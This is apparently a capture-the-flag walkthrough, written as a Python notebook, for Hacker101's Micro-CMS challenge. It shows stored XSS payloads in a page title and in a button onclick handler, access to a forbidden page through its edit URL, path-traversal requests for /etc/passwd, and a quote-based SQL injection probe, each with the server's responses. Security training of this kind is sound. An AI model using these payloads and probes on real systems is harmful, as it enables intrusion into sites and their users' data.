In [1]:
import requests, time

url = "https://a56773d9469f374124482238bda0a326.ctf.hacker101.com/" # Home page

session = requests.Session()

Get the homepage

In [ ]:
response = session.get(url)
print(response.text)

time.sleep(1) # Wait for 1 second

The response is:
```html
<!doctype html>
<html>
    <head>
        <title>Micro-CMS</title>
    </head>
    <body>
        <ul>
<li><a href="page/1">Testing</a></li>
<li><a href="page/2">Markdown Test</a></li>
        </ul>
        <a href="page/create">Create a new page</a>
    </body>
</html>
```

I try to access the "Testing page"

In [ ]:
response = session.get(url + "page/1")
print(response.text)
time.sleep(1) # Wait for 1 second

The response is:
```html
<!doctype html>
<html>
    <head>
        <title>Testing</title>
    </head>
    <body>
        <a href="../">&lt;-- Go Home</a><br>
        <a href="edit/1">Edit this page</a>
        <h1>Testing</h1>
<h1>Woo</h1>
<p>Testing out this new micro-CMS!</p>
    </body>
</html>
```

I am able to edit the page's content. I try to inject a script tag both in the title and the body -> **Stored XSS**

New title: ```<script>alert(1);</script>```
New body: ```<script>alert(2);</script>```

In [ ]:
response = session.post(url + "page/edit/1", data= {"title": "<script>alert(1);</script>", "body": "<script>alert(2);</script>"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
time.sleep(1) # Wait for 1 second

response = requests.get(url + "page/1")
print(response.text)
time.sleep(1) # Wait for 1 second

The response is:
```html
<!doctype html>
<html>
    <head>
        <title>&lt;script&gt;alert(1);&lt;/script&gt;</title>
    </head>
    <body>
        <a href="../">&lt;-- Go Home</a><br>
        <a href="edit/1">Edit this page</a>
        <h1>&lt;script&gt;alert(1);&lt;/script&gt;</h1>
	<scrubbed>alert(2);</scrubbed>
    </body>
</html>
```

Unluckily, the injected code has not been executed in the "/page/1". However, even if the body has been correctly sanitized, the title still contains the encoded versions of < >. So, the < > are still there, but in a different format. Moreover, I can see through DevTools that the web site does not include any CSP directive.

I want to try what is going to be showed in the homepage (considering that I changed the title of the testing page).

In [ ]:
response = session.get(url)
print(response.text)
time.sleep(1) # Wait for 1 second

Response:
```html
<!doctype html>
<html>
    <head>
        <title>Micro-CMS</title>
    </head>
    <body>
        <ul>
<li><a href="page/1"><script>alert("^FLAG^...$FLAG$");</script><script>alert(1);</script></a></li>
<li><a href="page/2">Markdown Test</a></li>
        </ul>
        <a href="page/create">Create a new page</a>
    </body>
</html>
```

## YES! The sanitation of the homepage is not implemented! One flag caught!

Now, I need to look for the remaining 3 flags...

I am going to use the functionality of creating pages to see what will happen.


In [ ]:
response = session.post(url + "page/create", data= {"title": "a", "body": "b"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
time.sleep(1) # Wait for 1 second

response = session.get(url)
print(response.text)
time.sleep(1) # Wait for 1 second

The home page has been changed in this way:
```html
<!doctype html>
<html>
    <head>
        <title>Micro-CMS</title>
    </head>
    <body>
        <ul>
<li><a href="page/1"><script>alert("^FLAG^eeed36e5fdc5a8d74ffa3742142f7a42f6374ed2ea9c5e454419189b643b41a5$FLAG$");</script><script>alert(1);</script></a></li>
<li><a href="page/2">Markdown Test</a></li>
<li><a href="page/7">a</a></li>
        </ul>
        <a href="page/create">Create a new page</a>
    </body>
</html>
```html

Why the new ID is 7 and not 3? I am going to try to access the pages related to IDs 3, 4, 5, 6.

In [ ]:
for i in range(3, 7):
	print(f"Requesting page {i}...")
	response = session.get(url + "page/" + str(i))
	print(f"Response status code: {response.status_code}. Response text: {response.text}")
	time.sleep(1) # Wait for 1 second

The various responses follow:
```html
Requesting page 3...
Response status code: 404. Response text: <!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Requesting page 4...
Response status code: 404. Response text: <!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Requesting page 5...
Response status code: 403. Response text: <!doctype html>
<html lang=en>
<title>403 Forbidden</title>
<h1>Forbidden</h1>
<p>You don&#39;t have the permission to access the requested resource. It is either read-protected or not readable by the server.</p>

Requesting page 6...
Response status code: 404. Response text: <!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
```

The response for page 5 is different from the others... **It says that I cannot access the resource, but something exists!**
Maybe I cannot read the page, but still modify it?

In [ ]:
response = session.get(url + "page/edit/5")
print(f"Response text: {response.text}")
time.sleep(1) # Wait for 1 second

The response is:
```html
<!doctype html>
<html>
    <head>
        <title>Edit page</title>
    </head>
    <body>
        <a href="../../">&lt;-- Go Home</a>
        <h1>Edit Page</h1>
        <form method="POST">
            Title: <input type="text" name="title" value="Private Page"><br>
            <textarea name="body" rows="10" cols="80">My secret is ^FLAG^...$FLAG$</textarea><br>
            <input type="submit" value="Save">
            <div style="font-style: italic"><a href="https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet">Markdown</a> is supported, but scripts are not</div>
        </form>
    </body>
</html>
```

## BOOM! Second flag caught! There are sill 2 flags to catch!

To simplify the visualization of the website from the browser, I am going to change again the title of Page 1.

In [ ]:
response = session.post(url + "page/edit/1", data= {"title": "Test", "body": "<script>alert(2);</script>"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
time.sleep(1) # Wait for 1 second

response = requests.get(url)
print(response.text)
time.sleep(1) # Wait for 1 second

New homepage:
```html
<!doctype html>
<html>
    <head>
        <title>Micro-CMS</title>
    </head>
    <body>
        <ul>
<li><a href="page/1">Test</a></li>
<li><a href="page/2">Markdown Test</a></li>
<li><a href="page/7">a</a></li>
        </ul>
        <a href="page/create">Create a new page</a>
    </body>
</html>
```

Now I don't have any clue on what I should do... However, I have seen that the page 2 includes a button... maybe I can exploit the button tag to execute XSS? Well, I could simply try to introduce inline JavaScript code in any event handler... -> **Stored XSS**

In [ ]:
response = session.get(url + "page/2")
print(response.text)
time.sleep(1) # Wait for 1 second


Page 2's content:
```html
<!doctype html>
<html>
    <head>
        <title>Markdown Test</title>
    </head>
    <body>
        <a href="../">&lt;-- Go Home</a><br>
        <a href="edit/2">Edit this page</a>
        <h1>Markdown Test</h1>
<p>Just testing some markdown functionality.</p>
<p><img alt="adorable kitten" src="https://static1.squarespace.com/static/54e8ba93e4b07c3f655b452e/t/56c2a04520c64707756f4267/1493764650017/" /></p>
<p><button>Some button</button></p>
    </body>
</html>
```

In [ ]:

response = session.post(url + "page/edit/7", data= {"title": "DaiDai", "body": '<button onclick="alert(1);">c</button>'}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
time.sleep(1) # Wait for 1 second

response = session.get(url + "page/7")
print(response.text)
time.sleep(1) # Wait for 1 second

The new content for page 7 is:
```html
<!doctype html>
<html>
    <head>
        <title>DaiDai</title>
    </head>
    <body>
        <a href="../">&lt;-- Go Home</a><br>
        <a href="edit/7">Edit this page</a>
        <h1>DaiDai</h1>
<p><button flag="^FLAG^...$FLAG$" onclick="alert(1);">c</button></p>
    </body>
</html>
```

## Good! New flag found! Only 1 undiscovered flag is left!

After some time spent doing brainstorming on the webiste, I think that the last flag is hidden somewhere in a file accessible by taking advantage of a **Path-Traversal-related vulnerability**.\
I tried to use an online free URL fuzzer on the endpoint ```url/``` and ```url/page/```, but it did not find out anything.\
Now, I want to inspect how the website manages the ```../```.

In [ ]:
response = session.get(url + "../../etc/passwd")
print(response.url)
time.sleep(1) # Wait for 1 second

response = session.get(url + "page/%2e%2e/%2e%2e/etc/passwd")
print(response.url)
time.sleep(1) # Wait for 1 second

It is very interesting to see how the website sanitizes the url path by removing ```../``` but not the ```%2e%2e/```. Maybe I can exploit it?

In [ ]:
response = session.get(url + "%2e%2e/%2e%2e/etc/passwd")
print(response.text)
print(response.url)
time.sleep(1) # Wait for 1 second

I tried multiple different paths but none worked.
The same response:
```html
<html>
<head><title>400 Bad Request</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
</body>
</html>
```

 I think that maybe it is not the right attack... I am going to use the hint provided by hacker101 platform... Hint: Have you tested for the usual culprits? XSS, SQL injection, path injection\
 Now I want to consider the SQL injection attack. I thought pages were stored directly into files, but maybe their content may be retrieved from DB by using the ID as unique key...

In [ ]:
response = session.get(url + "page/edit/1'")
print(response.text)
time.sleep(1) # Wait for 1 second

The response is directly the last flag:
```html
^FLAG^...$FLAG$
```

## Last flag caught!

It has been complex to find this last flag!